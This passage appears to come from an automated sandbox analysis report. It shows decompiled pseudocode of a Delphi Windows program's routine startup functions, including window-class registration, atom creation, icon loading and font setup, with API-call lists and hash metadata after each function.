                                                                                				intOrPtr _t23;
                                                                                				intOrPtr _t28;
                                                                                
                                                                                				_t25 = __esi;
                                                                                				_t17 = __ecx;
                                                                                				_push(_t28);
                                                                                				_push(0x440c7a);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t28;
                                                                                				 *0x487b6c =  *0x487b6c - 1;
                                                                                				if( *0x487b6c < 0) {
                                                                                					 *0x487b68 = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                                                                					_t31 =  *0x487b68;
                                                                                					E004409C0(_t16, __edi,  *0x487b68);
                                                                                					_t6 =  *0x431114; // 0x431160
                                                                                					E004135D4(_t6, _t16, _t17,  *0x487b68);
                                                                                					_t8 =  *0x431114; // 0x431160
                                                                                					E00413674(_t8, _t16, _t17, _t31);
                                                                                					_t21 =  *0x431114; // 0x431160
                                                                                					_t10 =  *0x442280; // 0x4422cc
                                                                                					E00413620(_t10, _t16, _t21, __esi, _t31);
                                                                                					_t22 =  *0x431114; // 0x431160
                                                                                					_t12 =  *0x440c84; // 0x440cd0
                                                                                					E00413620(_t12, _t16, _t22, __esi, _t31);
                                                                                					_t23 =  *0x431114; // 0x431160
                                                                                					_t14 =  *0x440e38; // 0x440e84
                                                                                					E00413620(_t14, _t16, _t23, _t25, _t31);
                                                                                				}
                                                                                				_pop(_t20);
                                                                                				 *[fs:eax] = _t20;
                                                                                				_push(0x440c81);
                                                                                				return 0;
                                                                                			}
















                                                                                APIs
                                                                                • GetVersion.KERNEL32(00000000,00440C7A), ref: 00440C0E
                                                                                  • Part of subcall function 004409C0: GetCurrentProcessId.KERNEL32(?,00000000,00440B38), ref: 004409E1
                                                                                  • Part of subcall function 004409C0: GlobalAddAtomA.KERNEL32 ref: 00440A14
                                                                                  • Part of subcall function 004409C0: GetCurrentThreadId.KERNEL32 ref: 00440A2F
                                                                                  • Part of subcall function 004409C0: GlobalAddAtomA.KERNEL32 ref: 00440A65
                                                                                  • Part of subcall function 004409C0: RegisterClipboardFormatA.USER32 ref: 00440A7B
                                                                                  • Part of subcall function 004409C0: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00440AFF
                                                                                  • Part of subcall function 004409C0: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440B10
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                • String ID:
                                                                                • API String ID: 3775504709-0
                                                                                • Opcode ID: 84fd9255da5c0ece7f2a95a703be49b491e2bf8b0af51a77d515eadb5685d01d
                                                                                • Instruction ID: e67370ff2c8a915d09f98d7b992bbfe6c99b42158f3494a24295611e547c08d6
                                                                                • Opcode Fuzzy Hash: 84fd9255da5c0ece7f2a95a703be49b491e2bf8b0af51a77d515eadb5685d01d
                                                                                • Instruction Fuzzy Hash: 0DF0F6B92041009FE720EF26EE938957795E74A705791053AF60043B72CA7CEC61DB6D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 37%
                                                                                			E00454818(intOrPtr _a4) {
                                                                                				intOrPtr _t26;
                                                                                
                                                                                				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 8)));
                                                                                				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 4)));
                                                                                				_push( *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)))));
                                                                                				_t26 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x30));
                                                                                				_push(_t26); // executed
                                                                                				L00406CF8(); // executed
                                                                                				 *((intOrPtr*)( *((intOrPtr*)(_a4 - 8)) + 0xc)) = _t26;
                                                                                				return _t26;
                                                                                			}





                                                                                APIs
                                                                                • NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 00454842
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: NtdllProc_Window
                                                                                • String ID:
                                                                                • API String ID: 4255912815-0
                                                                                • Opcode ID: 5ea0eff2d8d2a340c07e9b1a96fb3f22a4118a99491f868511381c8acdcdbb2f
                                                                                • Instruction ID: 8e3812bb2dbae8fdc8bd2ff27f39f94ffe5d655063029f50f454f61ff6dda21e
                                                                                • Opcode Fuzzy Hash: 5ea0eff2d8d2a340c07e9b1a96fb3f22a4118a99491f868511381c8acdcdbb2f
                                                                                • Instruction Fuzzy Hash: BDF0C579205608AFDB40DF9DC588D4AFBE8FB4C260B458195BD88CB321C234FE808F90
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 42%
                                                                                			E00454384(void* __eax, void* __ebx, void* __ecx) {
                                                                                				struct _WNDCLASSA _v44;
                                                                                				char _v48;
                                                                                				char* _t22;
                                                                                				long _t23;
                                                                                				CHAR* _t25;
                                                                                				struct HINSTANCE__* _t26;
                                                                                				intOrPtr* _t28;
                                                                                				signed int _t31;
                                                                                				intOrPtr* _t32;
                                                                                				signed int _t35;
                                                                                				struct HINSTANCE__* _t36;
                                                                                				void* _t38;
                                                                                				CHAR* _t39;
                                                                                				struct HWND__* _t40;
                                                                                				char* _t46;
                                                                                				char* _t51;
                                                                                				long _t54;
                                                                                				long _t58;
                                                                                				struct HINSTANCE__* _t61;
                                                                                				intOrPtr _t63;
                                                                                				void* _t68;
                                                                                				struct HMENU__* _t69;
                                                                                				intOrPtr _t76;
                                                                                				void* _t82;
                                                                                				short _t87;
                                                                                
                                                                                				_v48 = 0;
                                                                                				_t68 = __eax;
                                                                                				_push(_t82);
                                                                                				_push(0x45451b);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t82 + 0xffffffd4;
                                                                                				if( *((char*)(__eax + 0xa4)) != 0) {
                                                                                					L13:
                                                                                					_pop(_t76);
                                                                                					 *[fs:eax] = _t76;
                                                                                					_push(0x454522);
                                                                                					return E00404320( &_v48);
                                                                                				}
                                                                                				_t22 =  *0x486cc4; // 0x487048
                                                                                				if( *_t22 != 0) {
                                                                                					goto L13;
                                                                                				}
                                                                                				_t23 = E0041C940(E004548A0, __eax); // executed
                                                                                				 *(_t68 + 0x40) = _t23;
                                                                                				_t25 =  *0x46bc2c; // 0x45406c
                                                                                				_t26 =  *0x487714; // 0x400000
                                                                                				if(GetClassInfoA(_t26, _t25,  &_v44) == 0) {
                                                                                					_t61 =  *0x487714; // 0x400000
                                                                                					 *0x46bc18 = _t61;
                                                                                					_t87 = RegisterClassA(0x46bc08);
                                                                                					if(_t87 == 0) {
                                                                                						_t63 =  *0x486a78; // 0x41cc54
                                                                                						E00406520(_t63,  &_v48);
                                                                                						E0040A0B0(_v48, 1);
                                                                                						E00403D80();
                                                                                					}
                                                                                				}
                                                                                				_t28 =  *0x486b30; // 0x487a94
                                                                                				_t31 =  *((intOrPtr*)( *_t28))(0) >> 1;
                                                                                				if(_t87 < 0) {
                                                                                					asm("adc eax, 0x0");
                                                                                				}
                                                                                				_t32 =  *0x486b30; // 0x487a94
                                                                                				_t35 =  *((intOrPtr*)( *_t32))(1, _t31) >> 1;
                                                                                				if(_t87 < 0) {
                                                                                					asm("adc eax, 0x0");
                                                                                				}
                                                                                				_push(_t35);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_push(0);
                                                                                				_t36 =  *0x487714; // 0x400000
                                                                                				_push(_t36);
                                                                                				_push(0);
                                                                                				_t7 = _t68 + 0x8c; // 0x27800044
                                                                                				_t38 = E004047D0( *_t7);
                                                                                				_t39 =  *0x46bc2c; // 0x45406c, executed
                                                                                				_t40 = E00407288(_t39, 0x84ca0000, _t38); // executed
                                                                                				 *(_t68 + 0x30) = _t40;
                                                                                				_t9 = _t68 + 0x8c; // 0x44c59c
                                                                                				E00404320(_t9);
                                                                                				 *((char*)(_t68 + 0xa4)) = 1;
                                                                                				_t11 = _t68 + 0x40; // 0x10940000
                                                                                				_t12 = _t68 + 0x30; // 0xe
                                                                                				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                                                                				_t46 =  *0x486b9c; // 0x487b68
                                                                                				if( *_t46 != 0) {
                                                                                					_t54 = E00454F78(_t68);
                                                                                					_t13 = _t68 + 0x30; // 0xe
                                                                                					SendMessageA( *_t13, 0x80, 1, _t54); // executed
                                                                                					_t58 = E00454F78(_t68);
                                                                                					_t14 = _t68 + 0x30; // 0xe
                                                                                					SetClassLongA( *_t14, 0xfffffff2, _t58); // executed
                                                                                				}
                                                                                				_t15 = _t68 + 0x30; // 0xe
                                                                                				_t69 = GetSystemMenu( *_t15, "true");
                                                                                				DeleteMenu(_t69, 0xf030, 0);
                                                                                				DeleteMenu(_t69, 0xf000, 0);
                                                                                				_t51 =  *0x486b9c; // 0x487b68
                                                                                				if( *_t51 != 0) {
                                                                                					DeleteMenu(_t69, 0xf010, 0);
                                                                                				}
                                                                                				goto L13;
                                                                                			}





























                                                                                APIs
                                                                                  • Part of subcall function 0041C940: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 0041C95E
                                                                                • GetClassInfoA.USER32 ref: 004543D9
                                                                                • RegisterClassA.USER32 ref: 004543F1
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                • SetWindowLongA.USER32 ref: 0045448D
                                                                                • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 004544AF
                                                                                • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544C2
                                                                                • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544CD
                                                                                • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544DC
                                                                                • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 004544E9
                                                                                • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,0044C510), ref: 00454500
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                                                                • String ID: HpH$h{H$l@E
                                                                                • API String ID: 2103932818-3227393362
                                                                                • Opcode ID: 6ab2acdc5c7d5719350be9b99716f18ecc9a494cbdb557a77b08e715daafbf8c
                                                                                • Instruction ID: 6e4c490b6783f64956c43e3ed911a1460050a66f9724ccd8e5ea5c6e1907debb
                                                                                • Opcode Fuzzy Hash: 6ab2acdc5c7d5719350be9b99716f18ecc9a494cbdb557a77b08e715daafbf8c
                                                                                • Instruction Fuzzy Hash: 2A416270744200ABE710EF69DC81F6A37A8AB45308F55457AFE00EF2D3EA78B8448769
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E004409C0(void* __ebx, void* __edi, void* __eflags) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				long _v28;
                                                                                				char _v32;
                                                                                				char _v36;
                                                                                				intOrPtr _t25;
                                                                                				char _t29;
                                                                                				intOrPtr _t35;
                                                                                				intOrPtr _t38;
                                                                                				intOrPtr _t47;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr* _t50;
                                                                                				intOrPtr _t53;
                                                                                				struct HINSTANCE__* _t63;
                                                                                				intOrPtr* _t78;
                                                                                				intOrPtr* _t80;
                                                                                				intOrPtr _t83;
                                                                                				void* _t87;
                                                                                
                                                                                				_v20 = 0;
                                                                                				_v8 = 0;
                                                                                				_push(_t87);
                                                                                				_push(0x440b38);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t87 + 0xffffffe0;
                                                                                				_v16 = GetCurrentProcessId();
                                                                                				_v12 = 0;
                                                                                				E004092A0("Delphi%.8X", 0,  &_v16,  &_v8);
                                                                                				E00404374(0x487b74, _v8);
                                                                                				_t25 =  *0x487b74; // 0x2290e78
                                                                                				 *0x487b70 = GlobalAddAtomA(E004047D0(_t25));
                                                                                				_t29 =  *0x487714; // 0x400000
                                                                                				_v36 = _t29;
                                                                                				_v32 = 0;
                                                                                				_v28 = GetCurrentThreadId();
                                                                                				_v24 = 0;
                                                                                				E004092A0("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                                                                				E00404374(0x487b78, _v20);
                                                                                				_t35 =  *0x487b78; // 0x2290e94
                                                                                				 *0x487b72 = GlobalAddAtomA(E004047D0(_t35));
                                                                                				_t38 =  *0x487b78; // 0x2290e94
                                                                                				 *0x487b7c = RegisterClipboardFormatA(E004047D0(_t38));
                                                                                				 *0x487bb4 = E004141BC(1);
                                                                                				E004405C4();
                                                                                				 *0x487b64 = E004403EC(1, 1);
                                                                                				_t47 = E00452F98(1, __edi);
                                                                                				_t78 =  *0x486dac; // 0x487c00
                                                                                				 *_t78 = _t47;
                                                                                				_t49 = E0045407C(0, 1);
                                                                                				_t80 =  *0x486c60; // 0x487bfc
                                                                                				 *_t80 = _t49;
                                                                                				_t50 =  *0x486c60; // 0x487bfc
                                                                                				E00455B88( *_t50, 1);
                                                                                				_t53 =  *0x4302b8; // 0x4302bc
                                                                                				E00413760(_t53, 0x4327b4, 0x4327c4);
                                                                                				_t63 = GetModuleHandleA("USER32");
                                                                                				if(_t63 != 0) {
                                                                                					 *0x46b8cc = GetProcAddress(_t63, "AnimateWindow");
                                                                                				}
                                                                                				_pop(_t83);
                                                                                				 *[fs:eax] = _t83;
                                                                                				_push(0x440b3f);
                                                                                				E00404320( &_v20);
                                                                                				return E00404320( &_v8);
                                                                                			}

























                                                                                APIs
                                                                                • GetCurrentProcessId.KERNEL32(?,00000000,00440B38), ref: 004409E1
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00440A14
                                                                                • GetCurrentThreadId.KERNEL32 ref: 00440A2F
                                                                                • GlobalAddAtomA.KERNEL32 ref: 00440A65
                                                                                • RegisterClipboardFormatA.USER32 ref: 00440A7B
                                                                                  • Part of subcall function 004141BC: RtlInitializeCriticalSection.KERNEL32(004119BC,?,?,00440A91,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004141DB
                                                                                  • Part of subcall function 004405C4: SetErrorMode.KERNEL32(00008000), ref: 004405DD
                                                                                  • Part of subcall function 004405C4: GetModuleHandleA.KERNEL32(USER32,00000000,0044072A,?,00008000), ref: 00440601
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 0044060E
                                                                                  • Part of subcall function 004405C4: LoadLibraryA.KERNEL32(IMM32.DLL,00000000,0044072A,?,00008000), ref: 0044062A
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 0044064C
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00440661
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00440676
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 0044068B
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 004406A0
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 004406B5
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 004406CA
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 004406DF
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 004406F4
                                                                                  • Part of subcall function 004405C4: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00440709
                                                                                  • Part of subcall function 004405C4: SetErrorMode.KERNEL32(?,00440731,00008000), ref: 00440724
                                                                                  • Part of subcall function 00452F98: GetKeyboardLayout.USER32(00000000), ref: 00452FDD
                                                                                  • Part of subcall function 00452F98: 72E7AC50.USER32(00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00453032
                                                                                  • Part of subcall function 00452F98: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 0045303C
                                                                                  • Part of subcall function 00452F98: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00440ABA,00000000,00000000,?,00000000,?,00000000), ref: 00453047
                                                                                  • Part of subcall function 0045407C: LoadIconA.USER32(00400000,MAINICON), ref: 00454161
                                                                                  • Part of subcall function 0045407C: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00454193
                                                                                  • Part of subcall function 0045407C: OemToCharA.USER32(?,?), ref: 004541A6
                                                                                  • Part of subcall function 0045407C: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004541E6
                                                                                • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00440AFF
                                                                                • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00440B10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                                                                • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                • API String ID: 2159221912-1126952177
                                                                                • Opcode ID: 1018ce0efc8efdce6cc6525a3870734bce1b65eff92e5894b72814d9c40937eb
                                                                                • Instruction ID: cf8f2e16a86b900fa348f6b4382c58bee2ff4fefe60cf267411a8d94096d9238
                                                                                • Opcode Fuzzy Hash: 1018ce0efc8efdce6cc6525a3870734bce1b65eff92e5894b72814d9c40937eb
                                                                                • Instruction Fuzzy Hash: 484160B0A042449FD700EFB9D992A4E77B9EB49308B50497FF500E73A2DB38A910CB5D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0045407C(void* __ecx, char __edx) {
                                                                                				char _v5;
                                                                                				char _v261;
                                                                                				void* __ebx;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t39;
                                                                                				intOrPtr _t42;
                                                                                				intOrPtr _t43;
                                                                                				struct HINSTANCE__** _t53;
                                                                                				struct HICON__* _t55;
                                                                                				intOrPtr _t58;
                                                                                				struct HINSTANCE__** _t60;
                                                                                				void* _t67;
                                                                                				char* _t69;
                                                                                				char* _t75;
                                                                                				intOrPtr _t81;
                                                                                				intOrPtr* _t88;
                                                                                				intOrPtr* _t89;
                                                                                				intOrPtr _t90;
                                                                                				void* _t91;
                                                                                				char _t93;
                                                                                				void* _t104;
                                                                                				void* _t105;
                                                                                
                                                                                				_t93 = __edx;
                                                                                				_t91 = __ecx;
                                                                                				if(__edx != 0) {
                                                                                					_t105 = _t105 + 0xfffffff0;
                                                                                					_t39 = E00403918(_t39, _t104);
                                                                                				}
                                                                                				_v5 = _t93;
                                                                                				_t90 = _t39;
                                                                                				E0041B8BC(_t91, 0);
                                                                                				_t42 =  *0x486be0; // 0x46b468
                                                                                				if( *((short*)(_t42 + 2)) == 0) {
                                                                                					_t89 =  *0x486be0; // 0x46b468
                                                                                					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                                                                					 *_t89 = 0x4556b0;
                                                                                				}
                                                                                				_t43 =  *0x486c7c; // 0x46b470
                                                                                				_t109 =  *((short*)(_t43 + 2));
                                                                                				if( *((short*)(_t43 + 2)) == 0) {
                                                                                					_t88 =  *0x486c7c; // 0x46b470
                                                                                					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                                                                					 *_t88 = E004558A8;
                                                                                				}
                                                                                				 *((char*)(_t90 + 0x34)) = 0;
                                                                                				 *((intOrPtr*)(_t90 + 0x90)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t90 + 0xa8)) = E00403584(1);
                                                                                				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                                                                				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                                                                				 *((intOrPtr*)(_t90 + 0x5c)) = 0x80000018;
                                                                                				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                                                                				 *((char*)(_t90 + 0x7c)) = 1;
                                                                                				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                                                                				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                                                                				 *((char*)(_t90 + 0x88)) = 0;
                                                                                				 *((char*)(_t90 + 0x9d)) = 1;
                                                                                				 *((char*)(_t90 + 0xb4)) = 1;
                                                                                				_t103 = E00425320(1);
                                                                                				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                                                                				_t53 =  *0x486b10; // 0x48702c
                                                                                				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                                                                				E004256F0(_t103, _t55);
                                                                                				_t20 = _t90 + 0x98; // 0x736d
                                                                                				_t58 =  *_t20;
                                                                                				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                                                                				 *((intOrPtr*)(_t58 + 0x10)) = 0x455e18;
                                                                                				_t60 =  *0x486b10; // 0x48702c
                                                                                				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                                                                				OemToCharA( &_v261,  &_v261);
                                                                                				_t67 = E0040AC1C(0x5c, _t109);
                                                                                				_t110 = _t67;
                                                                                				if(_t67 != 0) {
                                                                                					_t27 = _t67 + 1; // 0x1
                                                                                					E00408B7C( &_v261, _t27);
                                                                                				}
                                                                                				_t69 = E0040AC44( &_v261, 0x2e, _t110);
                                                                                				if(_t69 != 0) {
                                                                                					 *_t69 = 0;
                                                                                				}
                                                                                				CharLowerA( &(( &_v261)[1]));
                                                                                				_t31 = _t90 + 0x8c; // 0x44c59c
                                                                                				E00404588(_t31, 0x100,  &_v261);
                                                                                				_t75 =  *0x486a08; // 0x487034
                                                                                				if( *_t75 == 0) {
                                                                                					E00454384(_t90, _t90, 0x100); // executed
                                                                                				}
                                                                                				 *((char*)(_t90 + 0x59)) = 1;
                                                                                				 *((char*)(_t90 + 0x5a)) = 1;
                                                                                				 *((char*)(_t90 + 0x5b)) = 1;
                                                                                				 *((char*)(_t90 + 0x9e)) = 1;
                                                                                				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                                                                				E00455FF4(_t90, 0x100);
                                                                                				E00456934(_t90);
                                                                                				_t81 = _t90;
                                                                                				if(_v5 != 0) {
                                                                                					E00403970(_t81);
                                                                                					_pop( *[fs:0x0]);
                                                                                				}
                                                                                				return _t90;
                                                                                			}


























                                                                                APIs
                                                                                • LoadIconA.USER32(00400000,MAINICON), ref: 00454161
                                                                                • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 00454193
                                                                                • OemToCharA.USER32(?,?), ref: 004541A6
                                                                                • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,00440AD0,00000000,00000000,?,00000000,?,00000000,00440B38), ref: 004541E6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Char$FileIconLoadLowerModuleName
                                                                                • String ID: ,pH$4pH$MAINICON
                                                                                • API String ID: 3935243913-227882389
                                                                                • Opcode ID: f53fe956146f441d54e70b7a00cf4f9a57cccc2ec6b3ccf925e9ace2007055e6
                                                                                • Instruction ID: dc94394b66be5087aa4e9421e0b69953404944942399699dc66eb831b3e2a9c9
                                                                                • Opcode Fuzzy Hash: f53fe956146f441d54e70b7a00cf4f9a57cccc2ec6b3ccf925e9ace2007055e6
                                                                                • Instruction Fuzzy Hash: 375194706042449FDB40EF39C885B897BE4AB15308F4540BAEC48DF397DBB9D988CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E00453774(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                                                                				char _v5;
                                                                                				struct tagLOGFONTA _v65;
                                                                                				struct tagLOGFONTA _v185;
                                                                                				struct tagLOGFONTA _v245;
                                                                                				void _v405;
                                                                                				void* _t23;
                                                                                				int _t27;
                                                                                				void* _t30;
                                                                                				intOrPtr _t38;
                                                                                				struct HFONT__* _t41;
                                                                                				struct HFONT__* _t45;
                                                                                				struct HFONT__* _t49;
                                                                                				intOrPtr _t52;
                                                                                				intOrPtr _t54;
                                                                                				void* _t57;
                                                                                				void* _t72;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				intOrPtr _t76;
                                                                                
                                                                                				_t72 = __edi;
                                                                                				_t74 = _t75;
                                                                                				_t76 = _t75 + 0xfffffe6c;
                                                                                				_t57 = __eax;
                                                                                				_v5 = 0;
                                                                                				if( *0x487bfc != 0) {
                                                                                					_t54 =  *0x487bfc; // 0x2291310
                                                                                					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                                                                				}
                                                                                				_push(_t74);
                                                                                				_push(0x4538b9);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t76;
                                                                                				if( *0x487bfc != 0) {
                                                                                					_t52 =  *0x487bfc; // 0x2291310
                                                                                					E00455B88(_t52, 0);
                                                                                				}
                                                                                				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                                                                					_t23 = GetStockObject(0xd);
                                                                                					_t7 = _t57 + 0x84; // 0x38004010
                                                                                					E0041ED08( *_t7, _t23, _t72);
                                                                                				} else {
                                                                                					_t49 = CreateFontIndirectA( &_v65); // executed
                                                                                					_t6 = _t57 + 0x84; // 0x38004010
                                                                                					E0041ED08( *_t6, _t49, _t72);
                                                                                				}
                                                                                				_v405 = 0x154;
                                                                                				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
